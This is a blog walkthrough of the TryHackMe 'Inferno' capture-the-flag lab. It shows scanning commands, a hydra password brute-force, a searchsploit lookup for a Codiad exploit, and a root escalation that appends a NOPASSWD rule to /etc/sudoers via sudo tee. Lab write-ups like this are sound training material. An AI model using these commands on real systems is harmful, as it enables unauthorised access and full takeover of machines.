TryHackME: Inferno

Today we will take a look at TryHackMe: Inferno. Please try to understand each step and take notes. Try to take quick and careful steps. Because demons will take you out often;)

Information Gathering

> Image analysis

view-source:http://10.10.223.163/1.jpg

First of all, let’s download the image and search

We found the name Dante. We need to save.

Enumeration/Scanning

> Nmap

sudo nmap -sS -sC -sV -oN nmap/initial 10.10.223.163

We found many open ports

I think this is a scam.

> Gobuster

gobuster dir -u http://10.10.223.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

But when we enter the site, we encounter authentication.

Turn on the hydra

Exploitation

Let’s attack with Hydra, but as a username, I will use the admin, root, which is used by default credential next to the dante we found earlier.

Command: hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 10.10.39.231 http-get /i****** -V -I -t 64

And here’s the password we could find if we guessed)

Admin panel

Log in with the same username and password.

> Get reverse shell

The admin panel is codiad. Find exploitation

Command: searchsploit codiad

Command: searchsploit -m multiple/webapps/50474.txt

But I wanted to do by admin panel

> Get reverse shell

If we search inside, we see an interesting .dat file in the downloads folder

Command: ls -la *

I saw it was hex and turned it into text.

> We found the username and password. Try to log in with ssh.

You can race against time while running the machine. Because demons will take you out. Think and decide for him as soon as possible.

Print the commands that are allowed to run as SUDO

Command: sudo -l

We can run “tee” as SUDO.

Command: echo “ALL ALL=NOPASSWD: ALL”|sudo tee -a /etc/sudoers

Privilege escalation

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Why Should I Learn About Debugging?

Priority Queue vs Sorting

Using GitLab to project manage home renovation priorities

Learning to problem solve as a new programmer

Free Nitro Nation Car Racing Game

Free Nitro Nation  Car Racing Game

The Architecture and Algorithms of Audio Indexing

Automate your iTerm

7 Foolproof Steps For Migrating To HubSpot Enterprise

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Wekor: TryHackMe

Mr Robot CTF Writeup

Tryhackme Archangel Writeup